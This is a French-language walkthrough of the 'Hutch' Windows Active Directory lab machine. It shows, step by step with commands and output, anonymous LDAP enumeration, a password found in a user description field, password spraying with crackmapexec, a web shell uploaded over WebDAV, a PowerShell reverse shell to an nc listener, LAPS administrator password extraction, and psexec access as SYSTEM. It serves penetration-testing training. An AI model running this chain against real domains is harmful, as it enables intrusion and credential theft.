# Hutch `ldap` `bloodhound.py` `kerberos` `laps` * Nom machine : Hutch * Difficulté : Intermédiaire * OS : Windows ## Enumération ### NMAP ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-03 08:23 EDT Nmap scan report for 192.168.218.122 Host is up (0.038s latency). Not shown: 65514 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-webdav-scan: | WebDAV type: Unknown | Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK | Server Date: Sat, 03 Aug 2024 12:28:06 GMT | Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK |_ Server Type: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT |_http-title: IIS Windows Server |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-03 12:27:17Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49676/tcp open msrpc Microsoft Windows RPC 49692/tcp open msrpc Microsoft Windows RPC 49856/tcp open msrpc Microsoft Windows RPC Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows ``` `(Domain: hutch.offsec0., Site: Default-First-Site-Name)` Nous avons ajouté " hutch.offsec " au fichier /etc/hosts ### LDAP (389) Nous allons extraire des noms d'utilisateurs ``` ┌──(kali㉿kali)-[~] └─$ ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.249.122" "(objectclass=*)" ldap_initialize( ldap://192.168.249.122:389/??base ) filter: (objectclass=*) requesting: All userApplication attributes # extended LDIF # # LDAPv3 # base with scope subtree # filter: (objectclass=*) # requesting: ALL # # hutch.offsec dn: DC=hutch,DC=offsec # Administrator, Users, hutch.offsec dn: CN=Administrator,CN=Users,DC=hutch,DC=offsec # Guest, Users, hutch.offsec dn: CN=Guest,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user {...} ``` La sortie est très longue, nous allons donc la réduire et selectionnant uniquement ce qui nous intéresse. ``` ┌──(kali㉿kali)-[~] └─$ ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.249.122" "(objectclass=*)" | grep sAMAccountName ldap_initialize( ldap://192.168.249.122:389/??base ) filter: (objectclass=*) requesting: All userApplication attributes sAMAccountName: Guest sAMAccountName: Domain Computers sAMAccountName: Cert Publishers sAMAccountName: Domain Users sAMAccountName: Domain Guests sAMAccountName: Group Policy Creator Owners sAMAccountName: RAS and IAS Servers sAMAccountName: Allowed RODC Password Replication Group sAMAccountName: Denied RODC Password Replication Group sAMAccountName: Enterprise Read-only Domain Controllers sAMAccountName: Cloneable Domain Controllers sAMAccountName: Protected Users sAMAccountName: DnsAdmins sAMAccountName: DnsUpdateProxy sAMAccountName: rplacidi sAMAccountName: opatry sAMAccountName: ltaunton sAMAccountName: acostello sAMAccountName: jsparwell sAMAccountName: oknee sAMAccountName: jmckendry sAMAccountName: avictoria sAMAccountName: jfrarey sAMAccountName: eaburrow sAMAccountName: cluddy sAMAccountName: agitthouse sAMAccountName: fmcsorley ``` Bingo ! Maintenant nous pouvons recopier ces noms d'utilisateurs dans un fichier. Nous pouvons par exemple utiliser gedit et utiliser la fonction rechercher et modifier. Nous allons voir si on ne trouve pas d'autres informations importantes ... ``` ┌──(kali㉿kali)-[~] └─$ ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.249.122" "(objectclass=*)" | grep Password ldap_initialize( ldap://192.168.249.122:389/??base ) filter: (objectclass=*) requesting: All userApplication attributes badPasswordTime: 133672742592729828 memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse # Allowed RODC Password Replication Group, Users, hutch.offsec dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec cn: Allowed RODC Password Replication Group distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutc name: Allowed RODC Password Replication Group sAMAccountName: Allowed RODC Password Replication Group # Denied RODC Password Replication Group, Users, hutch.offsec dn: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec cn: Denied RODC Password Replication Group distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch name: Denied RODC Password Replication Group sAMAccountName: Denied RODC Password Replication Group badPasswordTime: 133672743850542338 badPasswordTime: 133672743948511044 badPasswordTime: 133672744026479793 badPasswordTime: 133672744107886055 badPasswordTime: 133672744190229807 badPasswordTime: 133672744288354825 badPasswordTime: 133672744357573563 badPasswordTime: 133672744449761061 badPasswordTime: 133672744527886082 badPasswordTime: 133672744602104827 badPasswordTime: 133672744674448546 badPasswordTime: 133672744751011084 description: Password set to CrabSharkJellyfish192 at user's request. Please c badPasswordTime: 133672744830386057 ``` Nous trouvons donc un mot de passe ### Kerberos (88) ``` ┌──(kali㉿kali)-[~] └─$ /usr/share/doc/python3-impacket/examples/GetNPUsers.py hutch.offsec/ -dc-ip 192.168.249.122 -usersfile hutch.txt -format hashcat -outputfile hashes.txt {...} [-] User jfrarey doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User eaburrow doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User cluddy doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User agitthouse doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User fmcsorley doesn't have UF_DONT_REQUIRE_PREAUTH set [-] invalid principal syntax ``` Aucun hash de retrouver. Nous allons utiliser le mot de passe retrouvé plus tôt. ``` ┌──(kali㉿kali)-[~] └─$ crackmapexec smb 192.168.249.122 -u hutch.txt -p "CrabSharkJellyfish192" --continue-on-success SMB 192.168.249.122 445 HUTCHDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False) SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\Guest:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\rplacidi:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\opatry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\ltaunton:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\acostello:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\jsparwell:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\oknee:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\jmckendry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\avictoria:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\jfrarey:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\eaburrow:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\cluddy:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\agitthouse:CrabSharkJellyfish192 STATUS_LOGON_FAILURE SMB 192.168.249.122 445 HUTCHDC [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192 SMB 192.168.249.122 445 HUTCHDC [-] hutch.offsec\:CrabSharkJellyfish192 STATUS_LOGON_FAILURE ``` Le mot de passe appartient à fmcsorley ! ## Accès initial ### Cadaver (webDAV) Nous pouvons nous connecter au port 80 et upload un shell. Nous avons obtenu ses informations grâce au scan nmap où "post" est autorisé pour webdav. {% embed url="" %} ``` ┌──(kali㉿kali)-[~] └─$ cadaver http://192.168.212.122/ Authentication required for 192.168.212.122 on server `192.168.212.122': Username: fmcsorley Password: dav:/> put cmdasp.aspx Uploading cmdasp.aspx to `/cmdasp.aspx': Progress: [=============================>] 100.0% of 1401 bytes succeeded. ```
J'ai copié le reverse-shell PowerShell base64 de : {% embed url="" %} Puis lancer la commande, tout en ayant un listeneur sur ma macine kali ``` ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1234 listening on [any] 1234 ... connect to [192.168.45.180] from (UNKNOWN) [192.168.212.122] 50095 whoami iis apppool\defaultapppool PS C:\windows\system32\inetsrv> ``` ## Elévation des privilèges Nous pouvous voir un service LAPS . ``` PS C:\Program Files\LAPS> Directory: C:\Program Files\LAPS\CSE Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/22/2016 9:02 AM 148632 AdmPwd.dll ``` Nous pouvons l'exploiter. ``` ┌──(kali㉿kali)-[~] └─$ ldapsearch -x -H 'ldap://192.168.212.122' -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd # extended LDIF # # LDAPv3 # base with scope subtree # filter: (ms-MCS-AdmPwd=*) # requesting: ms-MCS-AdmPwd # # HUTCHDC, Domain Controllers, hutch.offsec dn: CN=HUTCHDC,OU=Domain Controllers,DC=hutch,DC=offsec ms-Mcs-AdmPwd: 0sxhC1%Om9UK(C # search reference ref: ldap://ForestDnsZones.hutch.offsec/DC=ForestDnsZones,DC=hutch,DC=offsec # search reference ref: ldap://DomainDnsZones.hutch.offsec/DC=DomainDnsZones,DC=hutch,DC=offsec # search reference ref: ldap://hutch.offsec/CN=Configuration,DC=hutch,DC=offsec # search result search: 2 result: 0 Success # numResponses: 5 # numEntries: 1 # numReferences: 3 ``` Ce qui nous intéresse : `ms-Mcs-AdmPwd: 0sxhC1%Om9UK(C` Nous avons exécuté psexec : ``` ┌──(kali㉿kali)-[~] └─$ impacket-psexec administrator:'0sxhC1%Om9UK(C'@192.168.212.122 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Requesting shares on 192.168.212.122..... [*] Found writable share ADMIN$ [*] Uploading file LHBVafld.exe [*] Opening SVCManager on 192.168.212.122..... [*] Creating service hYKZ on 192.168.212.122..... [*] Starting service hYKZ..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.1637] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system ``` Nous sommes nt authority\system ! Il y avait encore d'autres moyens de finir la box, par exemple, il était possible d'utiliser PrintSpoofer (SeImpersonate privileges : enabled).